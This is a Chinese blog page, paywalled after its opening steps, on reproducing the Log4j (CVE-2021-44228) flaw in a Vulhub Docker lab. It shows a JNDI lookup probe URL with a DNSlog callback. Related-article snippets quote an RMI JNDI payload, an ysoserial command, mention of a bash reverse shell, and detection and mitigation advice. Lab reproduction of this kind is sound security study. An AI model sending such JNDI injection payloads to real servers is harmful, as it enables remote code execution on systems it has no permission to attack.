利用Vulhub复现log4j漏洞

原创 已于 2022-04-27 22:30:03 修改 · 4.5k 阅读 · 5
标签
#网络安全
于 2022-04-27 22:29:42 首次发布
本文详细介绍了如何使用Vulhub搭建CVE-2021-44228(Log4j漏洞)的靶机环境,并通过DNSlog进行漏洞验证。接着,展示了如何利用JNDI-Injection-Exploit工具发起攻击,包括构建反弹shell的命令,最终成功实现远程控制。

Vulhub 搭建log4j漏洞环境,模拟攻击:

靶机:

首先进入log4j路径

cd vulhub/log4j/CVE-2021-44228/

搭建环境

sudo docker-compose build

sudo docker-compose  up -d

网址输入:http://127.0.0.1:8983/admin/cores

在DNSlog网站生成域名:jkvl0r.dnslog.cn

输入http://127.0.0.1:8983/admin/cores?action=${jndi:ldap://${sys:java.version}.jkvl0r.dnslog.cn}

可以看到:

可以看到

最低0.47元/天 解锁文章
Vulhub靶场-Log4j2
weixin_69010236的博客
01-24 1505
当日志中包含 ${},lookup就会去解析括号里面的内容,如:攻击payload:${jndi:rmi:192.168.96.1:1099/wqiyua} 当lookup解析到jndi时,就会调用jndi并利用rmi,执行攻击机jndi服务下的class文件并执行,从而造成任意命令执行漏洞
vulhublog4j
haoaaao的博客
05-02 1440
0x00 CVE-2017-5645(反序列化) 1、介绍 ApacheLog4j是一个用于Java的日志记录库,其支持启动远程日志服务器。Apache Log4j 2.8.2之前的2.x版本中存在安全漏洞。攻击者可利用漏洞执行任意代码。 2、搭建 docker 3、复现 使用ysoserial生成payload,然后发送给your-ip:4712端口 java -jar ysoserial.jar CommonsCollections5 "touch /tmp/CVE-2017-..
vulhublog4j
追风少年亚索的博客
11-18 1610
免责声明: 本人所有文章均为技术分享,均用于防御为目的的记录,所有操作均在实验环境下进行,请勿用于其他用途,否则后果自负。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
热门推荐
Bossfrank的博客
04-14 4万+
本文是log4j2远程代码执行漏洞原理和漏洞复现的详细说明。基于vulhub搭建靶场,攻击者利用log4j2框架下的lookup服务提供的{}字段解析功能,在{}内使用了了JNDI注入的方式,通过RMI或LDAP服务远程加载了攻击者提前部署好的恶意代码(.class),最终造成了远程代码执行。
log4j漏洞复现--vulhub
ccc_9wy的博客
12-08 2124
log4j漏洞复现;CVE-2021-44228 RCE漏洞;CVE-2017-5645 反序列化漏洞;JNDI;vulhub靶场;详细复现过程,带payload。
VULHUB复现log4j反序列化漏洞-CVE-2021-44228
carrot11223的博客
04-29 1401
下载利用工具:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0。我是用了yakit生成了一个可用域名,当然直接去dnslog平台生成也可以,但是我用习惯这个地方了,还是相当好用的一款国产化漏洞挖掘集成器。看这篇文章吧直接:https://blog.csdn.net/FisrtBqy/article/details/130680143。bash编码一下:https://www.sqlsec.com/rce/
利用Vulhub复现log4j漏洞CVE-2021-44228
plant1234的博客
10-02 961
这里的命令是想要靶机运行的命令,-A后放的是发出攻击的电脑的ip,也是存放-C后“命令”的ip地址。可以利用http://www.dnslog.cn/ 申请一个dns域名进行检测。接下来要实现反弹shell,可以用命令。
Log4j2 漏洞复现:从手动搭建 LDAP 环境到工具利用全记录(基于Vulhub
Luoxinru的博客
02-12 883
本文详细记录了基于 Vulhub 靶场的 Log4j2(CVE-2021-44228)远程代码执行漏洞复现全过程。文章不仅深入剖析了 JNDI 注入与 LDAP 协议的底层交互原理,更通过实战对比了**“手动编写恶意类+架设多终端 LDAP 转发”与“集成工具一键利用”**两种姿势。
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
heike_Ch的博客
08-14 4014
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
别再只盯着原理了!手把手教你用Docker快速搭建Log4j2漏洞靶场(Vulhub实战)
最新发布
weixin_30527323的博客
05-03 88
本文提供了一份实战指南,教你如何使用Docker和Vulhub快速搭建Log4j2漏洞靶场(CVE-2021-44228)。通过简明步骤,读者可以在5分钟内复现这一全球知名的安全漏洞,并学习如何安全验证和清理环境,适合安全研究人员和开发者快速掌握漏洞复现技术。
Vulhub——Log4j、solr
qq_55202378的博客
06-17 1708
同样需要先创建core,这次是在将。
[CVE-2021-44228]:log4j2漏洞学习与复现流程详解(vulhub环境)
qq_46145027的博客
05-10 4639
刚搭好vulhub,迫不及待的来复现一下2021-2022最潮最in的漏洞log4j2,因为算是热点了面试什么的的感觉都蛮容易被问到的,这里就来整理一下这个漏洞相关信息和漏洞复现的流程。
vulhubLog4j2:CVE-2021-44228漏洞复现
weixin_49422491的博客
09-13 4338
vulhubLog4j2:CVE-2021-44228漏洞复现
【vluhub】log4j注入漏洞 CVE-2021-44228
yh
07-23 1476
log4j漏洞复现vulhub搭建
vulhub-log4j漏洞复现
m0_62008601的博客
07-27 1548
vulhub-log4j漏洞复现
vulhub环境)[CVE-2021-44228]:log4j2漏洞复现流程详解
m0_62670778的博客
04-27 1669
下载对应的jar包。将jar包拷贝到kali虚拟机,或者直接在kali中下载。构造payload:这是一条bash反弹shell。将payload进行base64编码。
(七)vulhub专栏:Log4j 反序列化、远程代码执行漏洞复现
云舒的博客
07-21 1208
log4j 反序列化、远程代码执行漏洞
漏洞复现——Vulhup靶场-Log4j复现
qq_39289068的博客
05-06 712
log4j复现
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现(1)
m0_57541068的博客
04-18 896
我第一次复现的时候,直接用了JNDI注入工具JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar或JNDIExploit-1.4-SNAPSHOT.jar,可以在github上搜一下(后文会介绍),但我写博客的时候考虑到用这种工具感觉像是一键复现漏洞,对漏洞利用的每个步骤好像并不是很明确,所以我们还是先不用这种方法,还是老老实实自己编写一下恶意代码,启动一下恶意的http服务站点和LDAP服务,完整的演示一下过程。这两个任选一个都行。接下来,我们在攻击机启动LDAP服务。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

榴莲 蛋挞

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值